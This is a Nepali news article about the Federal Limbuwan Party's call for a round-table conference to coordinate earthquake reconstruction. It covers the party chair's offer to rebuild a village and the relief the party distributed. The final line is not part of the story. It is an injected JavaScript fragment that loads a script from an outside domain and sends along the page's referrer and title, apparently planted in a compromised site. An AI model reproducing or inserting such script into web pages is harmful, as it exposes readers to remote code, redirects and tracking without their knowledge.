पूर्वका नौ जिल्लालाई समेटेर अलग्गै लिम्बुवान राज्यको माग गरेर आन्दोलन गरिरहेको संघीय लिम्बुवान पार्टी, नेपालले सबै राजनीतिक पार्टी, संघ सस्थाहरुलाई भुकम्पका क्षतिग्रस्त बनेको गाँउको पुर्ननिर्माणमा लगाउन गोलमेच सम्मेलनको माग गरेको छ। पार्टीले बिहीबार काठमाडौंमा पत्रकार सम्मेलनमा पार्टीका अध्यक्ष कुमार लिङदेन मिराकले अहिले मुलुकको पुर्ननिर्माणकोलागि विदेशीलाई मात्र कुरेर बस्नु भन्दा पनि यतिवेला नेपालीलाई नेपालीकै आड भरोस चाहिएकोले गोलमेच सम्मेलन गरेर सबैलाई निश्चित स्थानको जिम्मा दिएर पुर्ननिर्माण गर्न गोलमेच सम्मेलनको आवश्यकतामा जोड दिनुभयो। मिराकले आफूहरु पुर्ननिर्माणमा योगदान गर्न तयार रहेको भन्दै तत्काल आफूहरुलाई राज्यले समन्वय गरेर कुनै एउटा गाँउ पुर्ननिर्माणको जिम्मा दिनु पर्ने माग गर्नुभयो।
उहाले लिम्बुवान क्षेत्रले प्राकृतिक विपत्ति सामना समिति गठन गराउने योजना बनाएको भन्दै तत्काल सस्था दर्ता गरेर भावी प्राकृतिक विपत्तिको सामना स्थानीय स्तरबाटै गर्न सक्ने तयारी गर्ने बताउनुभयो। सो पार्टीले भुकम्पपछि ललितपुर, धादिङ, सिन्धुपाल्चोक, सुन्दरीजल गोर्खा र दोलखामा कम्बल, त्रिपाल, म्याट्रेस र खाद्यान्न वितरण गरेको विवरण पत्रकार सम्मेलनमा प्रस्तुत गरिएको थियो।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;